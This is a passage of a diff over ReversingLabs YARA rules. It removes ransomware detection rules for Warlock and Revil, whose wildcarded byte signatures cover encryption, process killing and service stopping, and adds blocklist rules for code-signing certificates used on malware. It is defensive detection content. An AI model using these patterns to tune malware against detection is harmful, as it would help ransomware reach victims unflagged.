-            14 B2 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 46 4B 75 ?? BA ?? ??
-            ?? ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B C8 B8 ?? ?? ?? ?? 5A E8 ?? ?? ?? ?? BA ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50
-            8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C8 B8 ?? ?? ??
-            ?? 5A E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B D3 B8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? FF 35 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            50 8B D3 B8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8B D3 B8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? A1
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ??
-            E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ?? A1 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? B2 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 75 ??
-            A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? BA ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 75 ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $find_files_and_encrypt and $remote_connection_1 and $remote_connection_2
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "55:7b:0a:bf:44:04:58:27:f1:f3:6e:fb:c9:62:71:ec" and 1480291200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win64_Ransomware_Warlock : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_7903870184E18A80899740845A15E2B2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Warlock ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "66e2d232-c3d2-52ec-86f7-ede8c7796f94"
-		date = "2025-09-22"
-		modified = "2025-09-22"
+		id = "a55bed5b-906f-5c9d-bddd-b4d53d6351de"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Warlock.yara#L1-L162"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15846-L15862"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c0cf1491dba387c5b50ab9adfb2af978aacab19b13fbef78757544ad3a7f2475"
+		logic_hash = "ad32491b463d0b3b4c85ed78e81bb69802e5f90ae835f73e270b28f02b36f840"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Warlock"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            48 89 4C 24 ?? 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ??
-            ?? ?? 33 C0 83 F8 ?? 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C0 85 C0
-            74 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 90 E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8B 44 24 ?? FF C0 89 44 24 ?? 83
-            7C 24 ?? ?? 7D ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C0 85 C0 75 ?? 48 8B
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 EB ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            90 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 89 44 24
-            ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? EB ?? 48 8B 44 24 ?? 48 83 C0 ?? 48
-            89 44 24 ?? 48 8B 44 24 ?? 48 39 44 24 ?? 0F 84 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44
-            24 ?? C7 44 24 ?? ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C 24
-            ?? E8 ?? ?? ?? ?? 4C 8B C8 45 33 C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ??
-            ?? ?? 90 48 8B 4C 24 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 90
-        }
-		$encrypt_files_p2 = {
-            48 8B 4C 24 ?? E8 ?? ?? ?? ?? 0F B6 C0 85 C0 0F 84 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ??
-            85 C0 0F 85 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8D 8C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 4C 24
-            ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B D1 48 8B C8 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48
-            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ??
-            ?? ?? 41 B8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B D1 48 8B C8 FF 15 ?? ?? ?? ??
-            85 C0 0F 84 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 90 0F B6 05 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D
-            94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48
-            8B 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8B 94 24 ?? ??
-            ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B
-            C8 FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 74 ?? 48 8D 0D ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 44 8B C0 48 8D 15
-            ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 90 48
-        }
-		$encrypt_files_p3 = {
-            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 E9
-            ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90
-            0F B6 05 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 94 24 ?? ??
-            ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 84 24 ??
-            ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D
-            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B C8 FF 15 ??
-            ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 74 ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 44 8B C0 48 8D 15 ?? ?? ?? ??
-            48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 90 48 8D 8C 24 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 90 EB ?? 83 7C 24 ?? ?? 74 ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ??
-            48 8B C8 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 90 E9 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 E9 ??
-            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
-        }
-		$kill_processes = {
-            48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ?? 33 D2 B9
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 75 ?? E9 ?? ?? ?? ??
-            C7 44 24 ?? ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ??
-            83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8B 44 24 ?? FF C0 89
-            44 24 ?? 48 63 44 24 ?? 48 83 F8 ?? 73 ?? 48 63 44 24 ?? 48 8D 0D ?? ?? ?? ?? 48 8D
-            54 24 ?? 48 8B 0C C1 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 44 8B 44 24 ?? 33 D2 B9 ?? ?? ??
-            ?? FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ?? 48 8B 4C
-            24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 90 EB ?? EB ?? 48 8D 54 24
-            ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? E9 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15
-            ?? ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
-            C3
-        }
-		$stop_services_p1 = {
-            40 56 57 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ??
-            48 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 41
-            B8 ?? ?? ?? ?? 33 D2 33 C9 FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 75 ??
-            E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8B 44 24 ?? FF C0 89 44 24 ?? 48 63 44
-            24 ?? 48 83 F8 ?? 0F 83 ?? ?? ?? ?? 48 63 44 24 ?? 48 8D 0D ?? ?? ?? ?? 41 B8 ?? ??
-            ?? ?? 48 8B 14 C1 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ??
-            0F 84 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 41 B9 ?? ?? ?? ?? 4C 8D 84
-            24 ?? ?? ?? ?? 33 D2 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 BC
-            24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D
-            84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 45 33 C9 4C
-            8B 44 24 ?? BA ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 48 89 44 24
-            ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? 4C 8B C1 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 89
-            44 24 ?? 48 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ??
-            48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 44 8B 8C 24 ?? ?? ?? ?? 4C 8B 44 24 ?? BA ??
-            ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ??
-            ?? ?? EB ?? 8B 44 24 ?? FF C0 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 39 44 24 ?? 0F 83 ??
-            ?? ?? ?? 8B 44 24 ?? 48 6B C0 ?? 48 8D 4C 24 ?? 48 8B 54 24 ?? 48 8B F9 48 8D 34 02
-        }
-		$stop_services_p2 = {
-            B9 ?? ?? ?? ?? F3 A4 41 B8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B 4C 24 ?? FF 15 ?? ?? ??
-            ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? BA ??
-            ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 BC 24 ?? ?? ?? ?? ?? 74 ??
-            8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 41
-            B9 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 33 D2 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0
-            74 ?? 83 BC 24 ?? ?? ?? ?? ?? 75 ?? EB ?? FF 15 ?? ?? ?? ?? 2B 44 24 ?? 3B 44 24 ??
-            76 ?? EB ?? EB ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 90 E9 ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 4C 8B 44 24 ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D
-            84 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 BC
-            24 ?? ?? ?? ?? ?? 74 ?? 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 48 8D 84 24 ?? ??
-            ?? ?? 48 89 44 24 ?? 41 B9 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 33 D2 48 8B 4C 24 ??
-            FF 15 ?? ?? ?? ?? 85 C0 75 ?? EB ?? EB ?? 83 BC 24 ?? ?? ?? ?? ?? 75 ?? EB ?? FF 15
-            ?? ?? ?? ?? 2B 44 24 ?? 3B 44 24 ?? 76 ?? EB ?? EB ?? 48 8B 4C 24 ?? FF 15 ?? ?? ??
-            ?? 90 E9 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? 48
-            33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5F 5E C3
-        }
-		$find_drives = {
-            48 8D 84 24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA C7 44 24 ?? ?? ?? ?? ??
-            EB ?? 8B 44 24 ?? FF C0 89 44 24 ?? 83 7C 24 ?? ?? 7D ?? 48 63 44 24 ?? 48 8B 4C C4
-            ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 63 44 24 ?? 8B 4C 24 ?? 48 8B 44 C4 ?? 48 89
-            84 CC ?? ?? ?? ?? 8B 44 24 ?? FF C0 89 44 24 ?? EB ?? FF 15 ?? ?? ?? ?? 41 B8 ?? ??
-            ?? ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 75 ?? E9 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24
-            ?? ?? 75 ?? FF 15 ?? ?? ?? ?? 4C 8B 44 24 ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 90 E9
-            ?? ?? ?? ?? 83 7C 24 ?? ?? 0F 86 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 8D
-            8C 24 ?? ?? ?? ?? 44 8B 44 24 ?? 48 8D 94 24 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ??
-            ?? ?? 85 C0 74 ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 7E ?? B8 ?? ?? ??
-            ?? 48 6B C0 ?? 48 89 44 24 ?? 48 81 7C 24 ?? ?? ?? ?? ?? 73 ?? EB ?? E8 ?? ?? ?? ??
-            90 33 C0 48 8B 4C 24 ?? 66 89 84 0C ?? ?? 00 00 EB ?? 8B 44 24 ?? FF C8 8B C0 48 8B
-            54 24 ?? 48 8B 8C C4 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 44 24 ?? FF C8 89
-            44 24 ?? EB ?? EB ?? 41 B8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B 4C 24 ?? FF 15 ?? ?? ??
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B
-            44 24 ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ??
-            ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5F C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $encrypt_files_p* ) ) and ( $kill_processes ) and ( all of ( $stop_services_p* ) ) and ( $find_drives )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Qool Aid, LLC" and pe.signatures [ i ] . serial == "79:03:87:01:84:e1:8a:80:89:97:40:84:5a:15:e2:b2" and 1079654400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Revil : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5Fba9B373F812C16Aef531D4 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Revil ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "67c2f49e-b9dc-5900-a89d-49ba41088ac3"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "129e981a-064a-5930-bd45-d03ed008451c"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Revil.yara#L1-L101"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L15864-L15880"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "24a79477eb797d7a7121d1248ebbece833ccd256de55729ff96084135ce8d426"
+		logic_hash = "8b7340359778e3aa56f6ea300973af74eb77efd54108d2ca2b6b8f04d89a1c39"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Revil"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 8B 75 ?? 33 C0 57 8B 7D ?? 8B D8 50 56 89 45 ?? 89
-            5D ?? 89 45 ?? 89 45 ?? FF 57 ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8D 45 ?? 56 50 E8 ??
-            ?? ?? ?? 53 56 FF 77 ?? FF 57 ?? 83 C4 ?? 01 47 ?? 11 57 ?? E9 ?? ?? ?? ?? 8B 45 ??
-            0B 45 ?? 74 ?? FF 33 56 E8 ?? ?? ?? ?? 8B F3 8B 5B ?? 89 5D ?? FF 36 E8 ?? ?? ?? ??
-            56 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 8B 4D ?? 83 C0 ?? 89 45 ?? 83 D1 ?? 0B C1 89 4D
-            ?? 75 ?? 21 45 ?? 8B 75 ?? 33 C0 40 85 C0 0F 84 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? C7 04
-            24 ?? ?? ?? ?? 56 89 45 ?? E8 ?? ?? ?? ?? 59 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ??
-            ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
-            ?? ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? F7 85 ?? ?? ?? ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8D 04 46 50 E8 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 59 59
-            74 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 57 ?? 83 C4 ?? 85
-            C0 74 ?? 8D 45 ?? 56 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 77 ?? FF 57 ?? 83
-            C4 ?? 01 47 ?? 11 57 ?? EB ?? 8B 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 50 89 45 ?? 8D 85
-            ?? ?? ?? ?? 53 50 56 FF 57 ?? 83 C4 ?? 85 C0 74 ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 53 50
-            56 FF 77 ?? FF 57 ?? 83 C4 ?? 01 47 ?? 11 57 ?? 83 3F ?? 75 ?? 8D 85 ?? ?? ?? ?? 50
